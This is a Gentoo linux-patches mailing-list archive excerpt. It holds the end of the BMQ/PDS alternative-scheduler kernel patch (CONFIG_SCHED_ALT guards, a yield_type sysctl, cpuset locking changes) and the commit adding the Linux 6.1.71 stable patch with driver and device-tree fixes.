-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
-+				NORMAL_PRIO_MOD(rq->time_edge));
-+}
-+
-+static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
-+{
-+	if (p->prio >= MAX_RT_PRIO)
-+		p->deadline = (rq->clock >> sched_timeslice_shift) +
-+			p->static_prio - (MAX_PRIO - NICE_WIDTH);
-+}
-+
-+int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio > DEFAULT_PRIO);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq)
-+{
-+	struct list_head head;
-+	u64 old = rq->time_edge;
-+	u64 now = rq->clock >> sched_timeslice_shift;
-+	u64 prio, delta;
-+
-+	if (now == old)
-+		return;
-+
-+	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
-+	INIT_LIST_HEAD(&head);
-+
-+	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
-+		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
-+				      NORMAL_PRIO_MOD(prio + old), &head);
-+
-+	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
-+		rq->queue.bitmap[2] >> delta;
-+	rq->time_edge = now;
-+	if (!list_empty(&head)) {
-+		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
-+		struct task_struct *p;
-+
-+		list_for_each_entry(p, &head, sq_node)
-+			p->sq_idx = idx;
-+
-+		list_splice(&head, rq->queue.heads + idx);
-+		rq->queue.bitmap[2] |= 1UL;
-+	}
-+}
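-+
-+/*
-+ * In short: advance rq->time_edge to the current bucket, shift the
-+ * normal-priority bitmap by the number of expired edges, and splice
-+ * tasks from the expired levels onto the current level so they are
-+ * rescheduled at the new edge.
-+ */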
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+	sched_renew_deadline(p, rq);
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
-+{
-+	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
-+	if (unlikely(p->deadline > max_dl))
-+		p->deadline = max_dl;
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	sched_renew_deadline(p, rq);
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	time_slice_expired(p, rq);
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p) {}
-+#endif
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
-diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
-index 0f310768260c..bd38bf738fe9 100644
---- a/kernel/sched/pelt.c
-+++ b/kernel/sched/pelt.c
-@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
- 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
- }
-
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * sched_entity:
-  *
-@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
-
- 	return 0;
- }
-+#endif
-
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- /*
-  * thermal:
-  *
-diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
-index 3a0e0dc28721..e8a7d84aa5a5 100644
---- a/kernel/sched/pelt.h
-+++ b/kernel/sched/pelt.h
-@@ -1,13 +1,15 @@
- #ifdef CONFIG_SMP
- #include "sched-pelt.h"
-
-+#ifndef CONFIG_SCHED_ALT
- int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
- int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
- int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
- int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
- int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
-+#endif
-
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
-
- static inline u64 thermal_load_avg(struct rq *rq)
-@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
- 	return PELT_MIN_DIVIDER + avg->period_contrib;
- }
-
-+#ifndef CONFIG_SCHED_ALT
- static inline void cfs_se_util_change(struct sched_avg *avg)
- {
- 	unsigned int enqueued;
-@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
- 	return rq_clock_pelt(rq_of(cfs_rq));
- }
- #endif
-+#endif /* CONFIG_SCHED_ALT */
-
- #else
-
-+#ifndef CONFIG_SCHED_ALT
- static inline int
- update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
- {
-@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- {
- 	return 0;
- }
-+#endif
-
- static inline int
- update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
-diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
-index a4a20046e586..c363693cd869 100644
---- a/kernel/sched/sched.h
-+++ b/kernel/sched/sched.h
-@@ -5,6 +5,10 @@
- #ifndef _KERNEL_SCHED_SCHED_H
- #define _KERNEL_SCHED_SCHED_H
-
-+#ifdef CONFIG_SCHED_ALT
-+#include "alt_sched.h"
-+#else
-+
- #include <linux/sched/affinity.h>
- #include <linux/sched/autogroup.h>
- #include <linux/sched/cpufreq.h>
-@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
- 	cgroup_account_cputime(curr, delta_exec);
- }
-
-+static inline int task_running_nice(struct task_struct *p)
-+{
-+	return (task_nice(p) > 0);
-+}
-+#endif /* !CONFIG_SCHED_ALT */
- #endif /* _KERNEL_SCHED_SCHED_H */
-diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
-index 857f837f52cb..5486c63e4790 100644
---- a/kernel/sched/stats.c
-+++ b/kernel/sched/stats.c
-@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 	} else {
- 		struct rq *rq;
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		struct sched_domain *sd;
- 		int dcount = 0;
-+#endif
- #endif
- 		cpu = (unsigned long)(v - 2);
- 		rq = cpu_rq(cpu);
-@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 		seq_printf(seq, "\n");
-
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		/* domain-specific stats */
- 		rcu_read_lock();
- 		for_each_domain(cpu, sd) {
-@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 			    sd->ttwu_move_balance);
- 		}
- 		rcu_read_unlock();
-+#endif
- #endif
- 	}
- 	return 0;
-diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
-index 84a188913cc9..53934e7ef5db 100644
---- a/kernel/sched/stats.h
-+++ b/kernel/sched/stats.h
-@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
-
- #endif /* CONFIG_SCHEDSTATS */
-
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_FAIR_GROUP_SCHED
- struct sched_entity_stats {
- 	struct sched_entity     se;
-@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
- #endif
- 	return &task_of(se)->stats;
- }
-+#endif /* CONFIG_SCHED_ALT */
-
- #ifdef CONFIG_PSI
- void psi_task_change(struct task_struct *task, int clear, int set);
-diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
-index 8739c2a5a54e..d8dd6c15eb47 100644
---- a/kernel/sched/topology.c
-+++ b/kernel/sched/topology.c
-@@ -3,6 +3,7 @@
-  * Scheduler topology setup/handling methods
-  */
-
-+#ifndef CONFIG_SCHED_ALT
- DEFINE_MUTEX(sched_domains_mutex);
-
- /* Protected by sched_domains_mutex: */
-@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
-  */
-
- static int default_relax_domain_level = -1;
-+#endif /* CONFIG_SCHED_ALT */
- int sched_domain_level_max;
-
-+#ifndef CONFIG_SCHED_ALT
- static int __init setup_relax_domain_level(char *str)
- {
- 	if (kstrtoint(str, 0, &default_relax_domain_level))
-@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
-
- 	return sd;
- }
-+#endif /* CONFIG_SCHED_ALT */
-
- /*
-  * Topology list, bottom-up.
-@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
- 	sched_domain_topology_saved = NULL;
- }
-
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA
-
- static const struct cpumask *sd_numa_mask(int cpu)
-@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
- 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
- 	mutex_unlock(&sched_domains_mutex);
- }
-+#else /* CONFIG_SCHED_ALT */
-+void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
-+			     struct sched_domain_attr *dattr_new)
-+{}
-+
-+#ifdef CONFIG_NUMA
-+int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return best_mask_cpu(cpu, cpus);
-+}
-+#endif /* CONFIG_NUMA */
-+#endif
-diff --git a/kernel/sysctl.c b/kernel/sysctl.c
-index c6d9dec11b74..2bc42ce8b48e 100644
---- a/kernel/sysctl.c
-+++ b/kernel/sysctl.c
-@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
-
- /* Constants used for minimum and maximum */
-
-+#ifdef CONFIG_SCHED_ALT
-+extern int sched_yield_type;
-+#endif
-+
- #ifdef CONFIG_PERF_EVENTS
- static const int six_hundred_forty_kb = 640 * 1024;
- #endif
-@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
- }
-
- static struct ctl_table kern_table[] = {
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA_BALANCING
- 	{
- 		.procname	= "numa_balancing",
-@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
- 		.extra1		= SYSCTL_ZERO,
- 	},
- #endif /* CONFIG_NUMA_BALANCING */
-+#endif /* !CONFIG_SCHED_ALT */
- 	{
- 		.procname	= "panic",
- 		.data		= &panic_timeout,
-@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
- 		.proc_handler	= proc_dointvec,
- 	},
- #endif
-+#ifdef CONFIG_SCHED_ALT
-+	{
-+		.procname	= "yield_type",
-+		.data		= &sched_yield_type,
-+		.maxlen		= sizeof (int),
-+		.mode		= 0644,
-+		.proc_handler	= &proc_dointvec_minmax,
-+		.extra1		= SYSCTL_ZERO,
-+		.extra2		= SYSCTL_TWO,
-+	},
-+#endif
- #if defined(CONFIG_S390) && defined(CONFIG_SMP)
- 	{
- 		.procname	= "spin_retry",
-diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
-index 3ae661ab6260..35f0176dcdb0 100644
---- a/kernel/time/hrtimer.c
-+++ b/kernel/time/hrtimer.c
-@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
- 	int ret = 0;
- 	u64 slack;
-
-+#ifndef CONFIG_SCHED_ALT
- 	slack = current->timer_slack_ns;
- 	if (dl_task(current) || rt_task(current))
-+#endif
- 		slack = 0;
-
- 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
-diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
-index cb925e8ef9a8..67d823510f5c 100644
---- a/kernel/time/posix-cpu-timers.c
-+++ b/kernel/time/posix-cpu-timers.c
-@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
- 	u64 stime, utime;
-
- 	task_cputime(p, &utime, &stime);
--	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
-+	store_samples(samples, stime, utime, tsk_seruntime(p));
- }
-
- static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
-@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
- 	}
- }
-
-+#ifndef CONFIG_SCHED_ALT
- static inline void check_dl_overrun(struct task_struct *tsk)
- {
- 	if (tsk->dl.dl_overrun) {
-@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
- 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
- 	}
- }
-+#endif
-
- static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
- {
-@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
- 	u64 samples[CPUCLOCK_MAX];
- 	unsigned long soft;
-
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk))
- 		check_dl_overrun(tsk);
-+#endif
-
- 	if (expiry_cache_is_inactive(pct))
- 		return;
-@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
- 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
- 	if (soft != RLIM_INFINITY) {
- 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
--		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
-+		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
- 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
-
- 		/* At the hard limit, send SIGKILL. No further action. */
-@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
- 			return true;
- 	}
-
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk) && tsk->dl.dl_overrun)
- 		return true;
-+#endif
-
- 	return false;
- }
-diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
-index a2d301f58ced..2ccdede8585c 100644
---- a/kernel/trace/trace_selftest.c
-+++ b/kernel/trace/trace_selftest.c
-@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
- {
- 	/* Make this a -deadline thread */
- 	static const struct sched_attr attr = {
-+#ifdef CONFIG_SCHED_ALT
-+		/* No deadline on BMQ/PDS, use RR */
-+		.sched_policy = SCHED_RR,
-+#else
- 		.sched_policy = SCHED_DEADLINE,
- 		.sched_runtime = 100000ULL,
- 		.sched_deadline = 10000000ULL,
- 		.sched_period = 10000000ULL
-+#endif
- 	};
- 	struct wakeup_test_data *x = data;
-
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-index 03772805e4f9f1bf881740c8dd14aef667fbecf2..4742bbdfb2d715a439c0d505b4f293a82b76b255 100644
---- a/kernel/sched/alt_core.c
-+++ b/kernel/sched/alt_core.c
-@@ -5661,9 +5661,6 @@ static int __sched_setscheduler(struct task_struct *p,
- 			return retval;
- 	}
-
--	if (pi)
--		cpuset_read_lock();
--
- 	/*
- 	 * Make sure no PI-waiters arrive (or leave) while we are
- 	 * changing the priority of the task:
-@@ -5709,8 +5706,6 @@ static int __sched_setscheduler(struct task_struct *p,
- 		policy = oldpolicy = -1;
- 		__task_access_unlock(p, lock);
- 		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
--		if (pi)
--			cpuset_read_unlock();
- 		goto recheck;
- 	}
-
-@@ -5741,10 +5736,8 @@ static int __sched_setscheduler(struct task_struct *p,
- 	__task_access_unlock(p, lock);
- 	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-
--	if (pi) {
--		cpuset_read_unlock();
-+	if (pi)
- 		rt_mutex_adjust_pi(p);
--	}
-
- 	/* Run balance callbacks after we've adjusted the PI chain: */
- 	balance_callbacks(rq, head);
-@@ -5755,8 +5748,6 @@ static int __sched_setscheduler(struct task_struct *p,
- unlock:
- 	__task_access_unlock(p, lock);
- 	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
--	if (pi)
--		cpuset_read_unlock();
- 	return retval;
- }
-
-diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
-index 2f6606f4a3ec941f78b85a8ff997f2a6c0405218..71f5da268ee8e597ee15b2b440b4a80f8a6adb1c 100644
---- a/kernel/cgroup/cpuset.c
-+++ b/kernel/cgroup/cpuset.c
-@@ -2509,12 +2509,15 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
- 		if (ret)
- 			goto out_unlock;
-
-+#ifndef CONFIG_SCHED_ALT
- 		if (dl_task(task)) {
- 			cs->nr_migrate_dl_tasks++;
- 			cs->sum_migrate_dl_bw += task->dl.dl_bw;
- 		}
-+#endif
- 	}
-
-+#ifndef CONFIG_SCHED_ALT
- 	if (!cs->nr_migrate_dl_tasks)
- 		goto out_success;
-
-@@ -2535,6 +2538,7 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
- 	}
-
- out_success:
-+#endif
- 	/*
- 	 * Mark attach is in progress.  This makes validate_change() fail
- 	 * changes which zero cpus/mems_allowed.
-@@ -2558,12 +2562,14 @@ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
- 	if (!cs->attach_in_progress)
- 		wake_up(&cpuset_attach_wq);
-
-+#ifndef CONFIG_SCHED_ALT
- 	if (cs->nr_migrate_dl_tasks) {
- 		int cpu = cpumask_any(cs->effective_cpus);
-
- 		dl_bw_free(cpu, cs->sum_migrate_dl_bw);
- 		reset_migrate_dl_data(cs);
- 	}
-+#endif
-
- 	mutex_unlock(&cpuset_mutex);
- }
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-index 4742bbdfb2d715a439c0d505b4f293a82b76b255..8badb54c7d7b00bba30dbbd7206feeafbf919af2 100644
---- a/kernel/sched/alt_core.c
-+++ b/kernel/sched/alt_core.c
-@@ -7156,8 +7156,7 @@ int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
- 	return 1;
- }
-
--int task_can_attach(struct task_struct *p,
--		    const struct cpumask *cs_effective_cpus)
-+int task_can_attach(struct task_struct *p)
- {
- 	int ret = 0;
-


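The hunks above belong to the BMQ/PDS ("Project C") alternative scheduler patch: DEADLINE-class bookkeeping is compiled out under CONFIG_SCHED_ALT, and direct reads of p->se.sum_exec_runtime go through a tsk_seruntime() accessor so the same call sites build against either scheduler. A minimal sketch of how such an accessor can be defined follows; the CONFIG_SCHED_ALT field name used here (sched_time) is an assumption for illustration, not taken from this patch:

	#ifdef CONFIG_SCHED_ALT
	/* assumed field: the alt scheduler's own per-task runtime accounting */
	#define tsk_seruntime(t)	((t)->sched_time)
	#else
	/* stock scheduler: runtime lives in the sched_entity */
	#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
	#endif

tsk_rttimeout() in the RLIMIT_RTTIME hunk follows the same pattern for the rt.timeout field.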
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-05 14:50 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-05 14:50 UTC (permalink / raw
  To: gentoo-commits

commit:     2f071d103f4ef6bb3b35c2fa3533ff191c10b995
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jan  5 14:49:49 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jan  5 14:49:49 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2f071d10

Linux patch 6.1.71

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1070_linux-6.1.71.patch | 7517 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7521 insertions(+)

diff --git a/0000_README b/0000_README
index 9c608802..b95d2a2c 100644
--- a/0000_README
+++ b/0000_README
@@ -323,6 +323,10 @@ Patch:  1069_linux-6.1.70.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.70
 
+Patch:  1070_linux-6.1.71.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.71
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1070_linux-6.1.71.patch b/1070_linux-6.1.71.patch
new file mode 100644
index 00000000..b085fc4d
--- /dev/null
+++ b/1070_linux-6.1.71.patch
@@ -0,0 +1,7517 @@
+diff --git a/Makefile b/Makefile
+index 270593fcafdcd..2840e36fd5596 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 70
++SUBLEVEL = 71
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/am33xx.dtsi b/arch/arm/boot/dts/am33xx.dtsi
+index 32d397b3950b9..b2e7f6a710740 100644
+--- a/arch/arm/boot/dts/am33xx.dtsi
++++ b/arch/arm/boot/dts/am33xx.dtsi
+@@ -349,6 +349,7 @@
+ 					<SYSC_IDLE_NO>,
+ 					<SYSC_IDLE_SMART>,
+ 					<SYSC_IDLE_SMART_WKUP>;
++			ti,sysc-delay-us = <2>;
+ 			clocks = <&l3s_clkctrl AM3_L3S_USB_OTG_HS_CLKCTRL 0>;
+ 			clock-names = "fck";
+ 			#address-cells = <1>;
+diff --git a/drivers/base/property.c b/drivers/base/property.c
+index b0c40d9734847..eb9b01c2ff1d9 100644
+--- a/drivers/base/property.c
++++ b/drivers/base/property.c
+@@ -17,12 +17,19 @@
+ #include <linux/property.h>
+ #include <linux/phy.h>
+ 
+-struct fwnode_handle *dev_fwnode(const struct device *dev)
++struct fwnode_handle *__dev_fwnode(struct device *dev)
+ {
+ 	return IS_ENABLED(CONFIG_OF) && dev->of_node ?
+ 		of_fwnode_handle(dev->of_node) : dev->fwnode;
+ }
+-EXPORT_SYMBOL_GPL(dev_fwnode);
++EXPORT_SYMBOL_GPL(__dev_fwnode);
++
++const struct fwnode_handle *__dev_fwnode_const(const struct device *dev)
++{
++	return IS_ENABLED(CONFIG_OF) && dev->of_node ?
++		of_fwnode_handle(dev->of_node) : dev->fwnode;
++}
++EXPORT_SYMBOL_GPL(__dev_fwnode_const);
+ 
+ /**
+  * device_property_present - check if a property of a device is present
+diff --git a/drivers/iio/imu/adis16475.c b/drivers/iio/imu/adis16475.c
+index aec55f7e1f260..2d939773445d7 100644
+--- a/drivers/iio/imu/adis16475.c
++++ b/drivers/iio/imu/adis16475.c
+@@ -1243,50 +1243,6 @@ static int adis16475_config_irq_pin(struct adis16475 *st)
+ 	return 0;
+ }
+ 
+-static const struct of_device_id adis16475_of_match[] = {
+-	{ .compatible = "adi,adis16470",
+-		.data = &adis16475_chip_info[ADIS16470] },
+-	{ .compatible = "adi,adis16475-1",
+-		.data = &adis16475_chip_info[ADIS16475_1] },
+-	{ .compatible = "adi,adis16475-2",
+-		.data = &adis16475_chip_info[ADIS16475_2] },
+-	{ .compatible = "adi,adis16475-3",
+-		.data = &adis16475_chip_info[ADIS16475_3] },
+-	{ .compatible = "adi,adis16477-1",
+-		.data = &adis16475_chip_info[ADIS16477_1] },
+-	{ .compatible = "adi,adis16477-2",
+-		.data = &adis16475_chip_info[ADIS16477_2] },
+-	{ .compatible = "adi,adis16477-3",
+-		.data = &adis16475_chip_info[ADIS16477_3] },
+-	{ .compatible = "adi,adis16465-1",
+-		.data = &adis16475_chip_info[ADIS16465_1] },
+-	{ .compatible = "adi,adis16465-2",
+-		.data = &adis16475_chip_info[ADIS16465_2] },
+-	{ .compatible = "adi,adis16465-3",
+-		.data = &adis16475_chip_info[ADIS16465_3] },
+-	{ .compatible = "adi,adis16467-1",
+-		.data = &adis16475_chip_info[ADIS16467_1] },
+-	{ .compatible = "adi,adis16467-2",
+-		.data = &adis16475_chip_info[ADIS16467_2] },
+-	{ .compatible = "adi,adis16467-3",
+-		.data = &adis16475_chip_info[ADIS16467_3] },
+-	{ .compatible = "adi,adis16500",
+-		.data = &adis16475_chip_info[ADIS16500] },
+-	{ .compatible = "adi,adis16505-1",
+-		.data = &adis16475_chip_info[ADIS16505_1] },
+-	{ .compatible = "adi,adis16505-2",
+-		.data = &adis16475_chip_info[ADIS16505_2] },
+-	{ .compatible = "adi,adis16505-3",
+-		.data = &adis16475_chip_info[ADIS16505_3] },
+-	{ .compatible = "adi,adis16507-1",
+-		.data = &adis16475_chip_info[ADIS16507_1] },
+-	{ .compatible = "adi,adis16507-2",
+-		.data = &adis16475_chip_info[ADIS16507_2] },
+-	{ .compatible = "adi,adis16507-3",
+-		.data = &adis16475_chip_info[ADIS16507_3] },
+-	{ },
+-};
+-MODULE_DEVICE_TABLE(of, adis16475_of_match);
+ 
+ static int adis16475_probe(struct spi_device *spi)
+ {
+@@ -1300,7 +1256,7 @@ static int adis16475_probe(struct spi_device *spi)
+ 
+ 	st = iio_priv(indio_dev);
+ 
+-	st->info = device_get_match_data(&spi->dev);
++	st->info = spi_get_device_match_data(spi);
+ 	if (!st->info)
+ 		return -EINVAL;
+ 
+@@ -1340,12 +1296,83 @@ static int adis16475_probe(struct spi_device *spi)
+ 	return 0;
+ }
+ 
++static const struct of_device_id adis16475_of_match[] = {
++	{ .compatible = "adi,adis16470",
++		.data = &adis16475_chip_info[ADIS16470] },
++	{ .compatible = "adi,adis16475-1",
++		.data = &adis16475_chip_info[ADIS16475_1] },
++	{ .compatible = "adi,adis16475-2",
++		.data = &adis16475_chip_info[ADIS16475_2] },
++	{ .compatible = "adi,adis16475-3",
++		.data = &adis16475_chip_info[ADIS16475_3] },
++	{ .compatible = "adi,adis16477-1",
++		.data = &adis16475_chip_info[ADIS16477_1] },
++	{ .compatible = "adi,adis16477-2",
++		.data = &adis16475_chip_info[ADIS16477_2] },
++	{ .compatible = "adi,adis16477-3",
++		.data = &adis16475_chip_info[ADIS16477_3] },
++	{ .compatible = "adi,adis16465-1",
++		.data = &adis16475_chip_info[ADIS16465_1] },
++	{ .compatible = "adi,adis16465-2",
++		.data = &adis16475_chip_info[ADIS16465_2] },
++	{ .compatible = "adi,adis16465-3",
++		.data = &adis16475_chip_info[ADIS16465_3] },
++	{ .compatible = "adi,adis16467-1",
++		.data = &adis16475_chip_info[ADIS16467_1] },
++	{ .compatible = "adi,adis16467-2",
++		.data = &adis16475_chip_info[ADIS16467_2] },
++	{ .compatible = "adi,adis16467-3",
++		.data = &adis16475_chip_info[ADIS16467_3] },
++	{ .compatible = "adi,adis16500",
++		.data = &adis16475_chip_info[ADIS16500] },
++	{ .compatible = "adi,adis16505-1",
++		.data = &adis16475_chip_info[ADIS16505_1] },
++	{ .compatible = "adi,adis16505-2",
++		.data = &adis16475_chip_info[ADIS16505_2] },
++	{ .compatible = "adi,adis16505-3",
++		.data = &adis16475_chip_info[ADIS16505_3] },
++	{ .compatible = "adi,adis16507-1",
++		.data = &adis16475_chip_info[ADIS16507_1] },
++	{ .compatible = "adi,adis16507-2",
++		.data = &adis16475_chip_info[ADIS16507_2] },
++	{ .compatible = "adi,adis16507-3",
++		.data = &adis16475_chip_info[ADIS16507_3] },
++	{ },
++};
++MODULE_DEVICE_TABLE(of, adis16475_of_match);
++
++static const struct spi_device_id adis16475_ids[] = {
++	{ "adis16470", (kernel_ulong_t)&adis16475_chip_info[ADIS16470] },
++	{ "adis16475-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16475_1] },
++	{ "adis16475-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16475_2] },
++	{ "adis16475-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16475_3] },
++	{ "adis16477-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16477_1] },
++	{ "adis16477-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16477_2] },
++	{ "adis16477-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16477_3] },
++	{ "adis16465-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16465_1] },
++	{ "adis16465-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16465_2] },
++	{ "adis16465-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16465_3] },
++	{ "adis16467-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16467_1] },
++	{ "adis16467-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16467_2] },
++	{ "adis16467-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16467_3] },
++	{ "adis16500", (kernel_ulong_t)&adis16475_chip_info[ADIS16500] },
++	{ "adis16505-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16505_1] },
++	{ "adis16505-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16505_2] },
++	{ "adis16505-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16505_3] },
++	{ "adis16507-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16507_1] },
++	{ "adis16507-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16507_2] },
++	{ "adis16507-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16507_3] },
++	{ }
++};
++MODULE_DEVICE_TABLE(spi, adis16475_ids);
++
+ static struct spi_driver adis16475_driver = {
+ 	.driver = {
+ 		.name = "adis16475",
